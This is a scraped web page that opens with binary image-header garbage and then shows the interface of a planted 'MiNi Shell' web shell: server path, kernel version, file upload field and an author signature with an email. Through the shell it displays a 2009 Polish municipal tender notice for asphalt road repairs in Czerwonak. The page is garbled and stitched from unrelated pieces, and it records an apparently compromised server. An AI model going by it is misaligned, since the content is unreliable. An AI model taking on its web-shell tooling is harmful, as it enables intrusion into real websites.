JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090422/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090422/117098-N-2009.html

<p class="kh_header"><b>Czerwonak: Remont cząstkowy nawierzchni bitumicznych mieszanką mineralno-asfaltową
oraz grysami i emulsją asfaltową kationową dróg gminnych na terenie Gminy Czerwonak</b><br>
<b>Numer ogłoszenia: 117098 - 2009; data zamieszczenia: 22.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Czerwonak , ul. Źródlana 39, 62-004 Czerwonak, woj. wielkopolskie, tel. 061 6544204, faks 061 8120270.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.czerwonak.ug.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont cząstkowy nawierzchni bitumicznych mieszanką mineralno-asfaltową
oraz grysami i emulsją asfaltową kationową dróg gminnych na terenie Gminy Czerwonak.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie zadania pod nazwą: remont cząstkowy nawierzchni bitumicznych mieszanką mineralno-asfaltową oraz grysami i emulsją asfaltową kationową dróg gminnych na terenie Gminy Czerwonak. Zakres zamówienia obejmuje remont cząstkowy nawierzchni bitumicznych: a) mieszanką mineralno-asfaltową Swirowopiaskową z wytwórni o masie 58 ton, z ręcznym obcinaniem krawędzi; b) przy uSyciu grysów i emulsji asfaltowej kationowej z zastosowaniem skrapiarki przewoźnej - likwidacja rakowin o pow. 465,00 m2; c) przy uSyciu grysów i emulsji asfaltowej kationowej z zastosowaniem skrapiarki przewoźnej - remont wyboi o głębokości 2 cm o pow. 115,00 m2; d) przy uSyciu grysów i emulsji asfaltowej kationowej z zastosowaniem skrapiarki przewoźnej - remont wyboi o głębokości 3 cm o pow. 115,00 m2 Zamawiający będzie ustalał zakres robót, ich technologię i terminy realizacji sporządzając w miarę potrzeb protokoły typowania robót. Uszkodzone nawierzchnie będą kwalifikowane do remontu w zakresie określonym przez umocowanych pracowników Zamawiającego. Ubytki w nawierzchni zagraSające bezpieczeństwu ruchu drogowego muszą być wypełnione w terminie 24 godzin od momentu ich zgłoszenia (fax) pod rygorem poniesienia odpowiedzialności cywilnej za powstałe z tego powodu straty. Odbiory i rozliczenia wykonanych robót prowadzone będą na bieSąco. Wykonawca ma obowiązek uporządkowania pasa drogowego po zakończeniu robót na danym odcinku; w szczególności wywiezienia wyciętej masy bitumicznej i zebrania nadmiaru grysu. Okres gwarancji na wykonane prace musi wynosić min. 12 miesięcy. Faktyczne ilości określone w ppkt 2 a-d będą zaleSne od faktycznych potrzeb, a określenie maksymalnych, nieprzekraczalnychilości nie moSe - w razie mniejszych potrzeb - być podstawą roszczeń ze strony Wykonawcy.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wymagania dotyczące wadium
1) Wysokość wadium.
Wykonawca zobowiązany jest wnieść wadium w wysokości 1 500,00 zł
(słownie: jeden_tysiąc_pięćset_złotych).
2) Forma wadium.
Wadium moSe być wniesione w jednej lub kilku następujących formach:
a) pieniądzu;
b) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo -
kredytowej, gwarancjach tym, Se poręczenie kasy jest zawsze poręczeniem
pienięSnym;
c) gwarancjach bankowych;
d) gwarancjach ubezpieczeniowych;
e) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2
ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju
Przedsiębiorczości (Dz. U. t.j. z 2007r. Nr 42, poz. 275).
3) Miejsce i sposób i termin wniesienia wadium.
a) Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy
Zamawiającego Bank Zachodni WBK S.A. VII O. Poznań nr rachunku: 24 1090 1737
0000 0001 0792 9837 na przelewie naleSy umieścić informację wadium - remont
cząstkowy nawierzchni bitumicznych mieszanką mineralno-asfaltową oraz
grysami i emulsją asfaltową kationową dróg gminnych na terenie Gminy
Czerwonak
b) Wadium w pozostałych akceptowanych formach naleSy składać w oryginale w
siedzibie Zamawiającego - Urząd Gminy Czerwonak, ul. Źródlana 39, pok. 102, w
terminie do dnia 13 maja 2009r. do godziny 10:00,
c) Do oferty naleSy dołączyć kserokopię wnoszonego wadium.
d) Wadium naleSy wnieść przed upływem terminu składania ofert, przy czym
wniesienie wadium w pieniądzu za pomocą przelewu bankowego Zamawiający
będzie uwaSał za skuteczne tylko wówczas, gdy bank prowadzący rachunek
Zamawiającego potwierdzi, Se otrzymał taki przelew przed upływem terminu
składania ofert.
e) W wymienionym przypadku dołączenie do oferty kopii polecenia przelewu
wystawionego przez Wykonawcę jest warunkiem koniecznym, ale
niewystarczającym do stwierdzenia przez Zamawiającego terminowego wniesienia
wadium przez Wykonawcę.
4) Zwrot wadium.
a) Zamawiający zwraca niezwłocznie wadium, jeSeli:
- upłynął termin związania ofertą;
- zawarto umowę w sprawie zamówienia publicznego i wniesiono zabezpieczenie
naleSytego wykonania tej umowy;
- Zamawiający uniewaSnił postępowanie o udzielenie zamówienia, a protesty
zostały ostatecznie rozstrzygnięte lub upłynął termin do ich wnoszenia.
b) Zamawiający z zastrzeSeniem lit. c) zwraca niezwłocznie wadium na wniosek
Wykonawcy:
- który wycofał ofertę przed upływem terminu składania ofert;- który został wykluczony z postępowania;
- którego oferta została odrzucona.
c) JeSeli wadium wniesiono w pieniądzu, Zamawiający zwraca je wraz z odsetkami
wynikającymi z umowy rachunku bankowego, na którym było ono
przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz
prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez
Wykonawcę.
5) Ponowne wniesienie wadium
Zamawiający Sąda ponownego wniesienia wadium przez Wykonawców, którym
zwrócono wadium na podstawie ppkt 4) lit. b) tiret drugi i trzeci, jeSeli w wyniku
ostatecznego rozstrzygnięcia protestu uniewaSniono czynność wykluczenia
Wykonawcy lub odrzucenia oferty. Wykonawcy wnoszą wadium w terminie określonym
przez Zamawiającego.
6) Utrata wadium.
Zamawiający zatrzymuje wadium wraz z odsetkami, jeSeli Wykonawca, którego oferta
została wybrana:
a) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach
określonych w ofercie;
b) nie wniósł wymaganego zabezpieczenia naleSytego wykonania umowy;
c) zawarcie umowy w sprawie zamówienia publicznego stało się niemoSliwe z
przyczyn leSących po stronie Wykonawcy
d) Zamawiający zatrzyma wadium wraz z odsetkami, jeSeli wykonawca w odpowiedzi
na wezwanie, o którym mowa w art. 26 ust. 3 ( pkt 19 ppkt 2 lit. b SIWZ), nie złoSył
dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 (pkt 7 ppkt 1 i 2
SIWZ), lub pełnomocnictw, chyba, Se udowodni, Se wynika to z przyczyn
nieleSących po jego stronie.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny
spełniania tych warunków: Opis warunków udziału w postępowaniu oraz opis sposobu
dokonywania oceny spełniania tych warunków 1) O udzielenie zamówienia mogą ubiegać
się Wykonawcy, którzy spełniają następujące warunki: a) posiadają uprawnienia do
wykonywania określonej działalności lub czynności, jeSeli ustawy nakładają obowiązek
posiadania takich uprawnień (art. 22 ust. 1 pkt 1 Pzp), tj. posiadają: (1) aktualny odpis z
właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności
gospodarczej, jeSeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do
ewidencji działalności gospodarczej; b) posiadają niezbędną wiedzę i doświadczenie oraz
dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub
przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału
technicznego i osób zdolnych do wykonania zamówienia (art. 22 ust. 1 pkt 2 Pzp): tj. : (1)
dysponuję lub będzie dysponował narzędziami i urządzeniami tj. minimalnie: - samochód
typu termos-remonter do przewozu masy bitumicznej o ładowności min. 6 ton - 1 szt., -
skrapiarka o pojemności min. 850 litrów - 1 szt., - samochód cięSarowy z wywrotem o
ładowności min. 2 ton - 1 szt., c) znajdują się w sytuacji ekonomicznej i finansowej
zapewniającej wykonanie zamówienia (art. 22 ust. 1 pkt 3 Pzp, tj. posiadają
ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności
gospodarczej na sumę ubezpieczeniową nie niSszą niS 100.000 zł d) nie podlegają
wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 Pzp. 2) Ocena
spełniania ww. warunków dokonana zostanie w oparciu o informacje zawarte w
dokumentach i oświadczeniach załączonych do oferty, zgodnie z formułą spełnia - nie
spełnia 3) Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia
zobowiązani są do ustanowienia Pełnomocnika celem reprezentowania ich w niniejszym
postępowaniu albo reprezentowania ich w postępowaniu i zawarcia umowy w sprawie
zamówienia publicznego.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy
w celu potwierdzenia spełniania warunków udziału w postępowaniu: Wykaz
oświadczeń, dokumentów, jakie mają dostarczyć Wykonawcy w celu potwierdzenia
spełnienia warunków udziału w postępowaniu 1) W celu wykazania spełnienia warunków udziału w postępowaniu opisanych w pkt 6, kaSdy z Wykonawców powinien przedłoSyć wraz z ofertą następujące oświadczenia lub dokumenty: a) oświadczenie Wykonawcy o spełnianiu warunków określonych w art. 22 ust. 1 Pzp, stanowiące załącznik nr 1 do formularza oferty (w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia - oświadczenie ma obowiązek złoSyć ten lub ci z Wykonawców, którzy w imieniu wszystkich wykazywać będą spełnianie tego warunku), b) oświadczenie Wykonawcy, Se nie podlega wykluczeniu z postępowania napodstawie art. 24 Pzp, stanowiące załącznik nr 2 do formularza oferty (w przypadku
wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej
Wykonawców w ofercie muszą być złoSone przedmiotowe oświadczenia dla kaSdego z
nich), c) aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do
ewidencji działalności gospodarczej, wystawione nie wcześniej niS 6 miesięcy przed
upływem terminu składania ofert (w przypadku wspólnego ubiegania się o udzielenie
niniejszego zamówienia przez dwóch lub więcej Wykonawców w ofercie muszą być
złoSone przedmiotowe dokumenty dla kaSdego z nich), d) wykaz niezbędnych do
wykonania zamówienia urządzeń, jakimi dysponuje Wykonawca, na podstawie wzoru
stanowiącego załącznik nr 3 do formularza oferty. NaleSy wykazać minimalnie
dysponowanie sprzętem, o którym mowa w pkt 6.1 lit. b) (1) (w przypadku wspólnego
ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia,
warunek będzie rozpatrywany łącznie), e) pisemne zobowiązanie innych podmiotów do
udostępnienia niezbędnych do wykonania zamówienia narzędzi i urządzeń, jeSeli w
wykazie, o którym mowa w lit. d, wykonawca wskazał urządzenia i urządzenia, którymi
będzie dysponował, f) polisa a w przypadku jej braku inny dokument ubezpieczenia,
potwierdzający, Se Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w
zakresie prowadzonej działalności gospodarczej - naleSy wykazać minimalną wartość,
określoną w pkt 6.1) lit.c) SIWZ (w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniana będzie ich łączna sytuacja - w tym celu dokumenty ma obowiązek złoSyć ten lub ci z Wykonawców, którzy w imieniu wszystkich wykazywać będą spełnianie tego warunku), g) dowód wniesienia wadium. 2) Postanowienia dotyczące Wykonawców mających siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej: stosownie do treści § 2 rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006r. w sprawie rodzaju dokumentów jakich moSe Sądać zamawiający od wykonawcy oraz form w jakich dokumenty te mogą być składane (Dz. U. Nr 87, poz. 605 ze zmianami): a) jeSeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa powySej w: pkt. 7.1) lit. c, składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające, Se nie otwarto jego likwidacji ani nie ogłoszono upadłości, Przedmiotowy dokument/y, powinien być wystawiony nie wcześniej niS 6 m-cy przed upływem terminu składania ofert. b) jeSeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa powySej - lit a), zastępuje się je dokumentem zawierającym oświadczenie złoSone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca
ma siedzibę lub miejsce zamieszkania. WaSność dokumentów - jak w lit. a). 3) Ponadto Wykonawca składa: a) ofertę, wg wzoru oferty, stanowiącego część III SIWZ; b) kosztorys ofertowy wg wzoru, stanowiącego załącznik nr 4 do opisu przedmiotu zamówienia c) dokument ustanawiający Pełnomocnika do reprezentowania Wykonawców wspólnie ubiegających się o udzielenie niniejszego zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego - w przypadku, gdy Wykonawcy składają wspólną ofertę, a podpisywana jest przez pełnomocnika; d) stosowne pełnomocnictwo(a) - w przypadku, gdy upowaSnienie do podpisania oferty nie wynika bezpośrednio ze złoSonego w ofercie odpisu z właściwego rejestru albo zaświadczenia o wpisie do ewidencji działalności gospodarczej. 4) Dokumenty są składane w formie oryginału lub kopii poświadczonej ZA ZGODNOŚĆ Z ORYGINAŁEM przez Wykonawcę. Pełnomocnictwa naleSy złoSyć w oryginale lub poświadczonej przez notariusza kopii. Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski, poświadczonym - jak wySej - przez Wykonawcę. 5) JeSeli termin składania ofert ulegnie przesunięciu, wówczas dokumenty,które do tego czasu utraciły swą waSność winny zostać uaktualnione.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.czerwonak.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Czerwonak ul. śródlana 39 62-004 Czerwonak Wydział Zarządzania Drogami pok. 205.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.05.2009 godzina 10:00, miejsce: Urząd Gminy Czerwonak ul. śródlana 39 62-004 Czerwonak pok.3.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com